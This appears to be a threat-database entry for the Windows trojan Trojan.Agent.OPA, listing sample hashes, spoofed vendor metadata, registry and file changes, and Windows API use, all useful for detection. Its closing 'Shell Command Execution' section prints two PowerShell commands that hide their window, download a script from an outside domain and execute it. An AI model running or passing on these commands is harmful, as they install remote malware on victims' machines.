Multi-License Discount Quote

Change Region

English
Threat Database Trojans Trojan.Agent.OPA

Trojan.Agent.OPA

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 2,467
Threat Level: 80 % (High)
Infected Computers: 349
First Seen: October 1, 2024
Last Seen: March 4, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.Agent.OPA
Signature status: No Signature

Known Samples

MD5: 66b06e2c5d3a02c0324e8cd381d3aef4
SHA1: 86dde8f4a883e0f8024f463192237f916b53a6b8
SHA256: CF7A9D46DF6B7F1B7AD3A1E9E96F3CB4269C955E739A1B8FC888D1A94B72D314
File Size: 657.41 KB, 657408 bytes
MD5: 8918889bd2e058b9119147d65455daeb
SHA1: b648f4a743a7c20bdc9a6dae302ec385e0f5d76f
SHA256: BFA4422EAEF6B4EEC07CD4C278647602FBA87A77CF294284804D0159B93B5ACB
File Size: 351.23 KB, 351232 bytes
MD5: 7ad1e6d101bf6f491c565bd5379bd29d
SHA1: 11362c14086cceac1bbae01327fe36b140831116
SHA256: C9D442AF239EFC4DC46C01BD3FA178FE8ED89CEBE9C2B1F62D911207C8CC5393
File Size: 2.63 MB, 2634752 bytes
MD5: f001cdacd15e1e8bd0a5267e2d03243e
SHA1: 41baaef96b775375ecd19aadce3cd5d7065cc1ad
SHA256: 6BF51F4A226E9FB2748949474CD992167DBEF79E5055004F95460396C3FDF811
File Size: 147.46 KB, 147456 bytes
MD5: ce6354e788536c0b45fede3d8c32e1db
SHA1: bde2ee55944f257260a9afea7e4eecacfa2a7eba
SHA256: CDB47609B88411874EC4FE93F0AAAAF0DA8271F2AF29E2126CF8DE755BB7046E
File Size: 352.26 KB, 352256 bytes
Show More
MD5: f2b28695f67135de24683a183942fdb5
SHA1: 1f19a5b7a5ef908e1e11448549c599a9ccb40043
SHA256: B9B595FD5D07E50E269C1DB523EA7278123F747F4C9F1D64493715D58F32CA79
File Size: 167.94 KB, 167936 bytes
MD5: 5d22cfa3cb437968aad41ac25d0f83ef
SHA1: 56742cc36eecea4d5484ee2b9c8555154be1756c
SHA256: 2CF074424B03930DCA1323FB2B577545DBFAC0ED86E715A74944D9EFAE6638FD
File Size: 151.55 KB, 151552 bytes
MD5: 11a165a95b3cbec850c782ad2e0a1042
SHA1: 6e54aa9054555eb192b4f6cc6ba0a88bc81a618d
SHA256: C235AF51EBF810C46F5314EC7EB1F8145839946C848008A2D3D9009EF6835FD1
File Size: 312.32 KB, 312320 bytes
MD5: 893520ee8ca001e9a8932f08b529d945
SHA1: d361d39b1f64fca1157d320037359d081f1eb186
SHA256: 83643C8ABD9FD724907BCCDFB103B84256EC45B64EDC00E270049B92E316153B
File Size: 389.12 KB, 389120 bytes
MD5: 2c627407a3a9b9a7014dde4f43b65a24
SHA1: af58c4bc79dfca2e2dc5461a1aa5a63312de9561
SHA256: BFBB3CAFD258D60B989BCE4C24EFA7A7E03AE34395CFA7BD2C65BA99A77C2592
File Size: 158.21 KB, 158208 bytes
MD5: ddc21a7231b86247a54c4be7631746d8
SHA1: 4056cd39abbbc87a934c3e6a79e0ae12516d2295
SHA256: A9AAC8A8FFA20B2901D24E4F4E6C0EFDC20D6046EE3AF9A0ACB5BF98C4849983
File Size: 794.11 KB, 794112 bytes
MD5: f5b3b3cd19850eab1efb0f506a1ac967
SHA1: 371a8dc91f90dbdaf9ddc40e65d7fd0ae303d8b7
SHA256: 3959C644A6EE0B359851C3668CEB7F670546D6486AE8263161208CB201E42A4F
File Size: 194.56 KB, 194560 bytes
MD5: 6c7e2b5ab760e89411deaa9142f06cf3
SHA1: da79a890f2c6dc83a70f426422862dd5af00c329
SHA256: BF60015D44AFC78564C0696F9FDCA0A510198952EB79AD9612F35C5DDC7F3F36
File Size: 3.08 MB, 3078144 bytes
MD5: 4db390ebd25289814d49edc1f5fd755d
SHA1: 841aeffed95eec4eea65648fd9f93f288a014379
SHA256: 24C22B0DCBBBA546C4C0A677BD7E51EC4279E03654DD5C5D35F06E47CB2D8101
File Size: 380.42 KB, 380416 bytes
MD5: d405d391ed14080cd4fe6991c1aa575f
SHA1: 08cbeaffb88af484e1cb3a8003af527b9c147d0c
SHA256: F9A40DC8A64BB4736126590378151CE17A7868EF65393498677049E644FFFCC4
File Size: 175.10 KB, 175104 bytes
MD5: de8945cf8a5ed7be354f4355e185c490
SHA1: b052a14e6a30e825c5a418e288aeb4eb6d66a7e4
SHA256: A709FFC810E998E335025CE197B36C2395D876965EBCADD32F3A1F6D7B23D554
File Size: 195.07 KB, 195072 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have resources
  • File doesn't have security information
  • File has exports table
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
Show More
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Show More

Windows PE Version Information

Name Value
Comments metapath
Company Name
  • Autodesk, Inc.
  • Epic Games, Inc.
  • Florian Balmer et al.
  • Guillemot R&D Inc.
  • Kensington
  • RF Helper - Loader
File Description
  • AutoCAD component
  • BootstrapPackagedGame
  • KTGLDR Service X64
  • metapath File Browser
  • Test Application for Thrustmaster API Library.
File Version
  • 25.1.122.0.0
  • 4.24.01.5098
  • 2.51.0.0
  • 2.32.0.0
  • 1.1.7.9
  • 1.0.0.3
Internal Name
  • KTGLDRSrv
  • metapath
  • tm_sdk_api_lib_testapp.exe
  • UnrealEngine
Legal Copyright
  • All rights reserved.
  • Copyright (C) 2017-2025
  • Copyright 2025 Autodesk, Inc. All rights reserved.
  • Fill out your copyright notice in the Description page of Project Settings.
  • rfhelper.net ® 2020 - 2024
  • © 1996-2024 Florian Balmer and all contributors
Original Filename
  • BootstrapPackagedGame-Win64-Shipping.exe
  • metapath.exe
  • tm_sdk_api_lib_testapp.exe
Product Name
  • AutoCAD
  • BootstrapPackagedGame
  • KTGLDR Service X64
  • metapath
  • RF Helper - Loader
Product Version
  • 25.1.122.0.0
  • 4.24.01.5098
  • 1.1.7.9
  • 1.0.0.0
  • 0.0.0.0
  • ++UE4+Release-4.26-CL-0

Digital Signatures

Signer Root Status
Autodesk, Inc. DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 Hash Mismatch

File Traits

  • fptable
  • HighEntropy
  • No Version Info
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 379
Potentially Malicious Blocks: 1
Whitelisted Blocks: 377
Unknown Blocks: 1

Visual Map

? 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • AddUser.XB
  • Agent.GFOA
  • Agent.GSDT
  • Agent.IFSC
  • Agent.LKS
Show More
  • Agent.LPQ
  • Agent.LPQA
  • Agent.OSR
  • Agent.PSA
  • Exploit.X
  • Farfli.RE
  • Gamehack.GACE
  • Havoc.L
  • Kryptik.DTGC
  • Kryptik.KPJ
  • Mimikatz.CWK
  • Pycoon.A
  • Rugmi.GJ
  • ShellcodeRunner.KSA
  • ShellcodeRunner.LZ
  • ShellcodeRunner.TX
  • Spy.Agent.KG
  • Trojan.Agent.Gen.AAQ
  • Trojan.Agent.Gen.ADD
  • Trojan.Agent.Gen.AGT
  • Trojan.Agent.Gen.AHJ
  • Trojan.Agent.Gen.AQG
  • Trojan.Agent.Gen.ATY
  • Trojan.Agent.Gen.CD
  • Trojan.Agent.Gen.DZ
  • Trojan.Agent.Gen.GQ
  • Trojan.Agent.Gen.IN
  • Trojan.Agent.Gen.IU
  • Trojan.Agent.Gen.OC
  • Trojan.Agent.Gen.TX
  • Trojan.Agent.Gen.UT
  • Trojan.Agent.Gen.VW
  • Trojan.Agent.Gen.YS
  • Trojan.Agent.Gen.ZQ
  • Trojan.Downloader.Gen.CQ
  • Trojan.Downloader.Gen.DI
  • Trojan.Downloader.Gen.EN
  • Trojan.Injector.Gen.FLW
  • Trojan.Kryptik.Gen.CYB
  • Trojan.ShellcodeRunner.Gen.BD
  • Trojan.ShellcodeRunner.Gen.BL
  • Trojan.ShellcodeRunner.Gen.FJ
  • Trojan.ShellcodeRunner.Gen.FS
  • Trojan.ShellcodeRunner.Gen.JU

Files Modified

File Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134136776547180413.7232.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134136776547336726.6472.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167075550148938.672.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134167075550376978.7688.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
Show More
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_2ltv0sxq.r3m.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_34qyhnmg.tej.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_3wetjcdh.sxj.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_4y5c4rh1.ukq.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_navh4xrt.jeh.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_nvy3qtyn.ulm.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_onogysay.dkc.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_y43zjyqs.0h0.ps1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKCU\software\thrustmaster\apibridge::maintenance RegNtPreCreateKey
HKCU\software\thrustmaster\apibridge::maintenance RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\mountpoints2\##10.200.31.10#amas::_labelfromdesktopini RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 瘴ի貰ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask ￿ RegNtPreCreateKey
Show More
HKLM\software\microsoft\tracing\rasapi32::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filetracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask ￿ RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize  RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory %windir%\tracing RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe ꤸ躹꠾ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 浰躾꠾ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAccessCheckByType
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreatePortSection
Show More
  • ntdll.dll!NtAlpcCreateSectionView
  • ntdll.dll!NtAlpcCreateSecurityContext
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcQueryInformationMessage
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtAlpcSetInformation
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtCancelTimer2
  • ntdll.dll!NtCancelWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtGetCompleteWnfStateSubscription
  • ntdll.dll!NtImpersonateAnonymousToken
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeDirectoryFile
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtPowerInformation
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFile
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryTimerResolution
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueueApcThread
  • ntdll.dll!NtQueueApcThreadEx2
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory

127 additional items are not displayed above.

Other Suspicious
  • AdjustTokenPrivileges
Service Control
  • StartServiceCtrlDispatcher
Process Shell Execute
  • CreateProcess
  • WinExec
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetComputerName
  • GetUserDefaultLocaleName
  • GetUserName
  • GetUserNameEx
  • GetUserObjectInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
Encryption Used
  • BCryptOpenAlgorithmProvider
Network Winsock2
  • WSAConnect
  • WSASocket
  • WSAStartup
  • WSAttemptAutodialName
Network Winsock
  • closesocket
  • freeaddrinfo
  • getaddrinfo
  • recv
  • send
  • setsockopt
Network Winhttp
  • WinHttpOpen
Network Info Queried
  • GetAdaptersAddresses
  • GetNetworkParams

Shell Command Execution

c:\users\user\downloads\RED\Binaries\Win64\DRAGON_BALL_FighterZ.exe
powershell -Exec Bypass -NoProfile -WindowStyle Hidden -c "(New-Object Net.WebClient).DownloadString('http://atualizadoativado.com/0/0.ps1') | iex"
powershell -Exec Bypass -NoProfile -WindowStyle Hidden -c "(New-Object Net.WebClient).DownloadString('http://atualizadoativado.com/0/corel/0.ps1') | iex"

Trending

Most Viewed

Loading...